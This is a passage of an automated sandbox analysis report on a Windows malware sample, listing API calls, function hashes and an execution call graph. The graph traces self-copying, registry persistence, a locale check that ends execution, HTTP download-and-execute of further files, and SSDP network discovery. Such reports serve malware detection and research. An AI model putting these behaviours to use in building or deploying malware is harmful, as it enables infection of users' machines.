• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
• Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
• Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
• Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
• SysAllocString.OLEAUT32(004161D0), ref: 004073A3
• CoUninitialize.OLE32 ref: 004073C8
  • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
• SysFreeString.OLEAUT32(00000000), ref: 004073C2
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: String$Free$AllocInitializeUninitialize
• String ID:
• API String ID: 459949847-0
• Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
• Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
• Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
• Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
APIs
  • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
• SysFreeString.OLEAUT32(00000000), ref: 004075F8
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: CreateFreeInstanceString
• String ID: Microsoft Corporation
• API String ID: 586785272-3838278685
• Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
• Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
• Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
• Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
APIs
  • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
  • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
  • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
  • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
  • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
  • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
  • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
  • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
  • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
  • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
  • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
• SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
• SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
• String ID: %S%S
• API String ID: 1017111014-3267608656
• Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
• Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
• Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
• Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
  • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
  • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
  • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
  • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
  • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
  • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
  • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
  • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
  • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
  • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
• String ID: TCP$UDP
• API String ID: 1519345861-1097902612
• Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
• Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
• Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
• Instruction Fuzzy Hash: C111B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
APIs
• EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
• LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Similarity
• API ID: CriticalSectionmemcpy$EnterLeave
• String ID:
• API String ID: 469056452-0
• Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
• Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
• Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
• Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:22.8%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:1512
                                                                                                                                    Total number of Limit Nodes:37
[execution_graph: rendered call graph of 1512 nodes. The serialized node list that stood here ("<id> <address> <APIs>" per node, "<id>-><id>" per edge) is not readable as text; the paths recoverable from it are summarised below by image address.]
• Entry 407940: Sleep, CreateMutexA, GetLastError. One branch goes to 407976 ExitProcess; the other continues into 40797e (6 API calls), which branches to 407d31 and to 407a23.
• 407a23 -> 40f1b0 (GetLocaleInfoA, strcmp) -> 407a28, which either reaches 407a30 ExitProcess or 407a38 (ExpandEnvironmentStringsW, wsprintfW, CopyFileW) -> 407a8c (SetFileAttributesW, RegOpenKeyExW) -> 407ac8 (wcslen, RegSetValueExW) -> RegCloseKey, with 40f400 (memset, memset, CreateProcessW, then ShellExecuteW at 40f471 or Sleep at 40f462) called from the 407afd branch and 407b21 ExitProcess as one outcome. The same copy / SetFileAttributesW / RegOpenKeyExW / RegSetValueExW / RegCloseKey / 40f400 sequence repeats twice more (407b36, 407b7e, 407bba, 407c13 ExitProcess; 407c28, 407c87, 407cc3, 407d1c ExitProcess) before reaching 407d31.
• 407d31: Sleep, ShellExecuteW, ShellExecuteW, RegOpenKeyExW, followed by a chain of RegOpenKeyExW / RegSetValueExW / RegCloseKey nodes (407dcb, 407e24, 407e7d, 407ed6, 407f2f, 407f88, 40801f, 4080d9, 4081f0; 407fb5 sets three values and 408050 four values under one key; 40810a and 408221 are collapsed as 8 API calls each) ending at 408307 Sleep -> 40d180 -> 40d150 -> 40cda0 and the allocation helpers 40cf80, 40ce00, 40a740, 402420, 4024e0 and 40ab60 (__aligned_recalloc_base).
• 408322 (9 API calls) -> 405c00: InitializeCriticalSection, CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize, 40d1d0 / 405d30, UnmapViewOfFile, CloseHandle; 408322 also calls 4077f0, 4058c0 and 406f70 (Sleep, GetModuleFileNameW).
• 405d25 -> 40e0c0 CoInitializeEx -> 40e190 socket (the WS2_32 routine listed above), 40e400, 40b430 htons, 40ac80 and 40eef0 (24 API calls).
• 4083d2 -> 407390 (CoInitializeEx, SysAllocString) -> 4073e0 or 4073c8 CoUninitialize -> 4083d7 CreateEventA -> 40c8b0 (four calls of 40c870, 3 API calls each) -> 40dbb0 -> 40a740 -> 40dbc7 InitializeCriticalSection -> 40bc70 InitializeCriticalSection -> 40bcb9 CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize, UnmapViewOfFile, CloseHandle, with 40df20 (NtQuerySystemTime, RtlTimeToSecondsSince1980), 40b850 (32 API calls) and 40b510 EnterCriticalSection.
• 40dbe0 (341 API calls) is invoked repeatedly in sequence; expanded, it runs EnterCriticalSection, 40dcd0, 40a990 (9 API calls) and CreateThread at 40dc4b, whose successors are 40bdd0, 40dfd0, 401f50 GetQueuedCompletionStatus, 40e070, 40d980, 401920 (GetTickCount, WaitForSingleObject) and 40d930; it then runs GetCurrentProcess, GetCurrentProcess, DuplicateHandle at 40dc92 and LeaveCriticalSection at 40dcbb.
• 40dd50: GetCurrentThread, GetThreadPriority, GetCurrentThread, SetThreadPriority, InterlockedExchangeAdd at 40dd86, then a loop over EnterCriticalSection (40ddb9), WaitForSingleObject (40de03), LeaveCriticalSection (40de27) and Sleep (40de5c), ending with GetCurrentThread, SetThreadPriority at 40de69 -> 408480 -> 40de90: EnterCriticalSection, CloseHandle (repeated), LeaveCriticalSection, DeleteCriticalSection, 40ab60.
4688->4707 4691 40ce65 4689->4691 4692 40cf05 4690->4692 4693 4024e0 10 API calls 4691->4693 4694 4024e0 10 API calls 4692->4694 4695 40ce7f 4693->4695 4696 40cf1f 4694->4696 4697 402420 7 API calls 4695->4697 4699 402420 7 API calls 4696->4699 4698 40ce90 4697->4698 4700 4024e0 10 API calls 4698->4700 4701 40cf30 4699->4701 4700->4707 4702 4024e0 10 API calls 4701->4702 4703 40cf4a 4702->4703 4704 402420 7 API calls 4703->4704 4705 40cf5b 4704->4705 4706 4024e0 10 API calls 4705->4706 4706->4707 4707->4645 4726 40a760 4708->4726 4711 402420 4747 40a950 4711->4747 4754 402540 4716->4754 4718 4024ff __aligned_recalloc_base 4718->4664 4764 40a800 GetCurrentProcessId 4719->4764 4721 40ab6b 4722 40ab72 4721->4722 4765 40aaa0 4721->4765 4722->4670 4725 40ab87 RtlFreeHeap 4725->4722 4735 40a800 GetCurrentProcessId 4726->4735 4728 40a76b 4729 40a777 __aligned_recalloc_base 4728->4729 4736 40a820 4728->4736 4730 40a74e 4729->4730 4732 40a792 RtlAllocateHeap 4729->4732 4730->4681 4730->4711 4732->4730 4733 40a7b9 __aligned_recalloc_base 4732->4733 4733->4730 4734 40a7d4 memset 4733->4734 4734->4730 4735->4728 4744 40a800 GetCurrentProcessId 4736->4744 4738 40a829 4739 40a846 HeapCreate 4738->4739 4745 40a890 GetProcessHeaps 4738->4745 4741 40a860 HeapSetInformation GetCurrentProcessId 4739->4741 4742 40a887 4739->4742 4741->4742 4742->4729 4744->4738 4746 40a83c 4745->4746 4746->4739 4746->4742 4748 40a760 __aligned_recalloc_base 7 API calls 4747->4748 4749 40242b 4748->4749 4750 402820 4749->4750 4751 40282a 4750->4751 4752 40a950 __aligned_recalloc_base 7 API calls 4751->4752 4753 402438 4752->4753 4753->4658 4755 40258e 4754->4755 4762 402551 4754->4762 4756 40a950 __aligned_recalloc_base 7 API calls 4755->4756 4755->4762 4759 4025b2 _invalid_parameter 4756->4759 4757 4025e2 memcpy 4758 402606 _invalid_parameter 4757->4758 4760 40ab60 __aligned_recalloc_base 3 API calls 4758->4760 4759->4757 4761 40ab60 __aligned_recalloc_base 3 API calls 4759->4761 4760->4762 4763 
4025df 4761->4763 4762->4718 4763->4757 4764->4721 4766 40aad0 HeapValidate 4765->4766 4767 40aaf0 4765->4767 4766->4767 4767->4722 4767->4725 4785 40abd0 4768->4785 4773 40ab60 __aligned_recalloc_base 3 API calls 4774 40d211 4773->4774 4774->4546 4998 40a990 4775->4998 4778 405d6a memcpy 4780 40abd0 8 API calls 4778->4780 4779 405e28 4779->4546 4781 405da1 4780->4781 5008 40cb40 4781->5008 4786 40abfd 4785->4786 4787 40a950 __aligned_recalloc_base 7 API calls 4786->4787 4788 40ac14 memcpy 4786->4788 4789 40ac12 4786->4789 4787->4786 4788->4786 4789->4774 4790 40c6e0 4789->4790 4792 40c6ea 4790->4792 4794 40c721 memcmp 4792->4794 4795 40c748 4792->4795 4796 40ab60 __aligned_recalloc_base 3 API calls 4792->4796 4798 40c709 4792->4798 4799 40cbd0 4792->4799 4813 4084a0 4792->4813 4794->4792 4797 40ab60 __aligned_recalloc_base 3 API calls 4795->4797 4796->4792 4797->4798 4798->4773 4798->4774 4800 40cbdf __aligned_recalloc_base 4799->4800 4801 40a950 __aligned_recalloc_base 7 API calls 4800->4801 4812 40cbe9 4800->4812 4802 40cc78 4801->4802 4803 402420 7 API calls 4802->4803 4802->4812 4804 40cc8d 4803->4804 4805 402420 7 API calls 4804->4805 4806 40cc95 4805->4806 4808 40cced __aligned_recalloc_base 4806->4808 4816 40cd40 4806->4816 4821 402470 4808->4821 4811 402470 3 API calls 4811->4812 4812->4792 4929 40a6c0 4813->4929 4817 4024e0 10 API calls 4816->4817 4818 40cd54 4817->4818 4827 4026f0 4818->4827 4820 40cd6c 4820->4806 4823 402484 _invalid_parameter 4821->4823 4824 4024ce 4821->4824 4822 40ab60 __aligned_recalloc_base 3 API calls 4822->4824 4825 40ab60 __aligned_recalloc_base 3 API calls 4823->4825 4826 4024ac 4823->4826 4824->4811 4825->4826 4826->4822 4830 402710 4827->4830 4829 40270a 4829->4820 4831 402724 4830->4831 4832 402540 __aligned_recalloc_base 10 API calls 4831->4832 4833 40276d 4832->4833 4834 402540 __aligned_recalloc_base 10 API calls 4833->4834 4835 40277d 4834->4835 4836 402540 __aligned_recalloc_base 10 API calls 4835->4836 4837 40278d 
4836->4837 4838 402540 __aligned_recalloc_base 10 API calls 4837->4838 4839 40279d 4838->4839 4840 4027a6 4839->4840 4841 4027cf 4839->4841 4845 403e20 4840->4845 4862 403df0 4841->4862 4844 4027c7 __aligned_recalloc_base 4844->4829 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403e37 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 403e46 4848->4849 4850 402820 _invalid_parameter 7 API calls 4849->4850 4851 403e55 4850->4851 4852 402820 _invalid_parameter 7 API calls 4851->4852 4853 403e64 _invalid_parameter __aligned_recalloc_base 4852->4853 4855 40400f _invalid_parameter 4853->4855 4865 402850 4853->4865 4856 402850 _invalid_parameter 3 API calls 4855->4856 4857 404035 _invalid_parameter 4855->4857 4856->4855 4858 402850 _invalid_parameter 3 API calls 4857->4858 4859 40405b _invalid_parameter 4857->4859 4858->4857 4860 402850 _invalid_parameter 3 API calls 4859->4860 4861 404081 4859->4861 4860->4859 4861->4844 4869 404090 4862->4869 4864 403e0c 4864->4844 4866 402866 4865->4866 4867 40285b 4865->4867 4866->4853 4868 40ab60 __aligned_recalloc_base 3 API calls 4867->4868 4868->4866 4870 4040a6 _invalid_parameter 4869->4870 4871 4040dd 4870->4871 4873 4040b8 _invalid_parameter 4870->4873 4876 404103 4870->4876 4899 403ca0 4871->4899 4873->4864 4874 40413d 4909 404680 4874->4909 4875 40415e 4878 402820 _invalid_parameter 7 API calls 4875->4878 4876->4874 4876->4875 4879 40416f 4878->4879 4880 402820 _invalid_parameter 7 API calls 4879->4880 4881 40417e 4880->4881 4882 402820 _invalid_parameter 7 API calls 4881->4882 4883 40418d 4882->4883 4884 402820 _invalid_parameter 7 API calls 4883->4884 4885 40419c 4884->4885 4922 403d70 4885->4922 4887 402820 _invalid_parameter 7 API calls 4888 4041ca _invalid_parameter 4887->4888 4888->4887 4891 404284 _invalid_parameter __aligned_recalloc_base 4888->4891 4889 402850 _invalid_parameter 3 API calls 4889->4891 4890 4045a3 _invalid_parameter 4892 402850 _invalid_parameter 3 API calls 4890->4892 
4893 4045c9 _invalid_parameter 4890->4893 4891->4889 4891->4890 4892->4890 4894 402850 _invalid_parameter 3 API calls 4893->4894 4895 4045ef _invalid_parameter 4893->4895 4894->4893 4896 402850 _invalid_parameter 3 API calls 4895->4896 4897 404615 _invalid_parameter 4895->4897 4896->4895 4897->4873 4898 402850 _invalid_parameter 3 API calls 4897->4898 4898->4897 4900 403cae 4899->4900 4901 402820 _invalid_parameter 7 API calls 4900->4901 4902 403ccb 4901->4902 4903 402820 _invalid_parameter 7 API calls 4902->4903 4904 403cda _invalid_parameter 4903->4904 4905 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4904->4905 4906 403d3a _invalid_parameter 4904->4906 4905->4904 4907 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4906->4907 4908 403d60 4906->4908 4907->4906 4908->4873 4910 402820 _invalid_parameter 7 API calls 4909->4910 4911 404697 4910->4911 4912 402820 _invalid_parameter 7 API calls 4911->4912 4913 4046a6 4912->4913 4914 402820 _invalid_parameter 7 API calls 4913->4914 4921 4046b5 _invalid_parameter __aligned_recalloc_base 4914->4921 4915 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4915->4921 4916 404841 _invalid_parameter 4917 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4916->4917 4918 404867 _invalid_parameter 4916->4918 4917->4916 4919 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4918->4919 4920 40488d 4918->4920 4919->4918 4920->4873 4921->4915 4921->4916 4923 402820 _invalid_parameter 7 API calls 4922->4923 4924 403d7f _invalid_parameter 4923->4924 4925 403ca0 _invalid_parameter 9 API calls 4924->4925 4926 403db8 _invalid_parameter 4925->4926 4927 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4926->4927 4928 403de3 4926->4928 4927->4926 4928->4888 4930 40a6d2 4929->4930 4933 40a620 4930->4933 4934 40a950 __aligned_recalloc_base 7 API calls 4933->4934 4935 40a630 4934->4935 4937 40a66c 4935->4937 4940 
4084bf 4935->4940 4942 409b50 4935->4942 4949 40a140 4935->4949 4954 40a510 4935->4954 4939 40ab60 __aligned_recalloc_base 3 API calls 4937->4939 4939->4940 4940->4792 4943 409b59 4942->4943 4944 409b63 4942->4944 4943->4935 4944->4943 4945 409ba6 memset 4944->4945 4945->4943 4946 409bc7 4945->4946 4946->4943 4947 409bcd memcpy 4946->4947 4962 409920 4947->4962 4950 40a14d 4949->4950 4951 40a157 4949->4951 4950->4935 4951->4950 4952 40a24f memcpy 4951->4952 4967 409e70 4951->4967 4952->4951 4955 40a526 4954->4955 4960 40a51c 4954->4960 4956 409e70 64 API calls 4955->4956 4955->4960 4957 40a5a7 4956->4957 4958 409920 6 API calls 4957->4958 4957->4960 4959 40a5c6 4958->4959 4959->4960 4961 40a5db memcpy 4959->4961 4960->4935 4961->4960 4963 40996e 4962->4963 4965 40992e 4962->4965 4963->4943 4965->4963 4966 409860 6 API calls 4965->4966 4966->4965 4968 409e80 4967->4968 4969 409e8a 4967->4969 4968->4951 4969->4968 4977 409cb0 4969->4977 4972 409fc8 memcpy 4972->4968 4974 409fe7 memcpy 4975 40a111 4974->4975 4976 409e70 62 API calls 4975->4976 4976->4968 4978 409cbd 4977->4978 4979 409cc7 4977->4979 4978->4968 4978->4972 4978->4974 4979->4978 4980 409d50 4979->4980 4982 409d55 4979->4982 4983 409d38 4979->4983 4988 409610 4980->4988 4986 409920 6 API calls 4982->4986 4985 409920 6 API calls 4983->4985 4985->4980 4986->4980 4987 409dfc memset 4987->4978 4989 40961f 4988->4989 4990 409629 4988->4990 4989->4978 4989->4987 4990->4989 4991 4094e0 9 API calls 4990->4991 4992 409722 4991->4992 4993 40a950 __aligned_recalloc_base 7 API calls 4992->4993 4994 409771 4993->4994 4994->4989 4995 409350 46 API calls 4994->4995 4996 40979e 4995->4996 4997 40ab60 __aligned_recalloc_base GetCurrentProcessId HeapValidate RtlFreeHeap 4996->4997 4997->4989 5017 40a800 GetCurrentProcessId 4998->5017 5000 40a99b 5001 40a820 __aligned_recalloc_base 5 API calls 5000->5001 5007 40a9a7 __aligned_recalloc_base 5000->5007 5001->5007 5002 405d55 5002->4778 5002->4779 5003 40aaa0 
__aligned_recalloc_base HeapValidate 5003->5007 5004 40aa50 HeapAlloc 5004->5007 5005 40aa1a HeapReAlloc 5005->5007 5006 40ab60 __aligned_recalloc_base 3 API calls 5006->5007 5007->5002 5007->5003 5007->5004 5007->5005 5007->5006 5011 40cb4b 5008->5011 5009 40a950 __aligned_recalloc_base 7 API calls 5009->5011 5010 405ded 5010->4779 5012 4076c0 5010->5012 5011->5009 5011->5010 5013 40a950 __aligned_recalloc_base 7 API calls 5012->5013 5014 4076d0 5013->5014 5015 407717 5014->5015 5016 4076dc memcpy CreateThread CloseHandle 5014->5016 5015->4779 5016->5015 5018 407720 GetTickCount srand rand Sleep 5016->5018 5017->5000 5019 407757 5018->5019 5020 4077ad 5018->5020 5021 4077ab 5019->5021 5024 407766 StrChrA 5019->5024 5020->5021 5022 40f560 63 API calls 5020->5022 5023 40ab60 __aligned_recalloc_base 3 API calls 5021->5023 5022->5021 5025 4077d8 5023->5025 5026 40777b 5024->5026 5029 40f560 9 API calls 5026->5029 5030 40f623 InternetOpenUrlW 5029->5030 5031 40f78e InternetCloseHandle Sleep 5029->5031 5032 40f781 InternetCloseHandle 5030->5032 5033 40f652 CreateFileW 5030->5033 5034 40f7b5 6 API calls 5031->5034 5035 407795 Sleep 5031->5035 5032->5031 5036 40f681 InternetReadFile 5033->5036 5037 40f774 CloseHandle 5033->5037 5034->5035 5038 40f831 wsprintfW DeleteFileW Sleep 5034->5038 5035->5019 5039 40f6d4 CloseHandle wsprintfW DeleteFileW Sleep 5036->5039 5040 40f6a5 5036->5040 5037->5032 5041 40f240 21 API calls 5038->5041 5058 40f240 CreateFileW 5039->5058 5040->5039 5042 40f6ae WriteFile 5040->5042 5044 40f871 5041->5044 5042->5036 5046 40f87b Sleep 5044->5046 5047 40f8af DeleteFileW 5044->5047 5050 40f400 6 API calls 5046->5050 5047->5035 5048 40f767 DeleteFileW 5048->5037 5049 40f72b Sleep 5051 40f400 6 API calls 5049->5051 5052 40f892 5050->5052 5053 40f742 5051->5053 5054 40f8ad 5052->5054 5056 40f8a5 ExitProcess 5052->5056 5055 40f75e 5053->5055 5057 40f756 ExitProcess 5053->5057 5054->5035 5055->5037 5059 40f285 CreateFileMappingW 5058->5059 5060 40f39a 
5058->5060 5061 40f390 CloseHandle 5059->5061 5062 40f2a6 MapViewOfFile 5059->5062 5063 40f3a0 CreateFileW 5060->5063 5064 40f3f1 5060->5064 5061->5060 5065 40f2c5 GetFileSize 5062->5065 5066 40f386 CloseHandle 5062->5066 5067 40f3c2 WriteFile CloseHandle 5063->5067 5068 40f3e8 5063->5068 5064->5048 5064->5049 5069 40f2e1 5065->5069 5070 40f37c UnmapViewOfFile 5065->5070 5066->5061 5067->5068 5071 40ab60 __aligned_recalloc_base 3 API calls 5068->5071 5080 40d1a0 5069->5080 5070->5066 5071->5064 5074 40cb40 7 API calls 5075 40f330 5074->5075 5075->5070 5076 40f34d memcmp 5075->5076 5076->5070 5077 40f369 5076->5077 5078 40ab60 __aligned_recalloc_base 3 API calls 5077->5078 5079 40f372 5078->5079 5079->5070 5081 40cbd0 10 API calls 5080->5081 5082 40d1c4 5081->5082 5082->5070 5082->5074 5084 40e2ee 5083->5084 5085 40e1bd htons inet_addr setsockopt 5083->5085 5084->4556 5086 40b430 8 API calls 5085->5086 5087 40e236 bind lstrlenA sendto ioctlsocket 5086->5087 5091 40e28b 5087->5091 5088 40e2b2 5140 40b4f0 shutdown closesocket 5088->5140 5091->5088 5092 40a990 9 API calls 5091->5092 5131 40e310 5091->5131 5092->5091 5147 40e640 memset InternetCrackUrlA InternetOpenA 5093->5147 5096 40e51e 5096->4556 5099 40ab60 __aligned_recalloc_base 3 API calls 5099->5096 5100 40e4eb 5100->5099 5105 40e4e1 SysFreeString 5105->5100 5254 40b3f0 inet_addr 5108->5254 5111 40b4dd 5116 40eef0 5111->5116 5112 40b48c connect 5113 40b4a0 getsockname 5112->5113 5114 40b4d4 5112->5114 5113->5114 5257 40b4f0 shutdown closesocket 5114->5257 5258 40b3d0 inet_ntoa 5116->5258 5118 40ef06 5119 40d470 11 API calls 5118->5119 5120 40ef25 5119->5120 5121 40e14c 5120->5121 5259 40ef70 memset InternetCrackUrlA InternetOpenA 5120->5259 5121->4562 5124 40ef5c 5126 40ab60 __aligned_recalloc_base 3 API calls 5124->5126 5125 40ab60 __aligned_recalloc_base 3 API calls 5125->5124 5126->5121 5129 40ac84 5127->5129 5128 40ac8a 5128->4552 5129->5128 5130 40ab60 GetCurrentProcessId HeapValidate RtlFreeHeap 
__aligned_recalloc_base 5129->5130 5130->5129 5136 40e32c 5131->5136 5132 40e3f4 5132->5091 5133 40e348 recvfrom 5134 40e376 StrCmpNIA 5133->5134 5135 40e369 Sleep 5133->5135 5134->5136 5137 40e395 StrStrIA 5134->5137 5135->5136 5136->5132 5136->5133 5137->5136 5138 40e3b6 StrChrA 5137->5138 5141 40d320 5138->5141 5140->5084 5142 40d32b 5141->5142 5143 40d331 lstrlenA 5142->5143 5144 40d344 5142->5144 5145 40a950 __aligned_recalloc_base 7 API calls 5142->5145 5146 40d360 memcpy 5142->5146 5143->5142 5143->5144 5144->5136 5145->5142 5146->5142 5146->5144 5148 40e6e1 InternetConnectA 5147->5148 5149 40e41a 5147->5149 5150 40e84a InternetCloseHandle 5148->5150 5151 40e71a HttpOpenRequestA 5148->5151 5149->5096 5160 40e530 5149->5160 5150->5149 5152 40e750 HttpSendRequestA 5151->5152 5153 40e83d InternetCloseHandle 5151->5153 5154 40e830 InternetCloseHandle 5152->5154 5156 40e76d 5152->5156 5153->5150 5154->5153 5155 40e78e InternetReadFile 5155->5156 5157 40e7bb 5155->5157 5156->5155 5156->5157 5158 40a990 9 API calls 5156->5158 5157->5154 5159 40e7d6 memcpy 5158->5159 5159->5156 5189 40d250 5160->5189 5163 40e433 5163->5100 5170 40eea0 5163->5170 5164 40e55a SysAllocString 5165 40e571 CoCreateInstance 5164->5165 5166 40e627 5164->5166 5167 40e61d SysFreeString 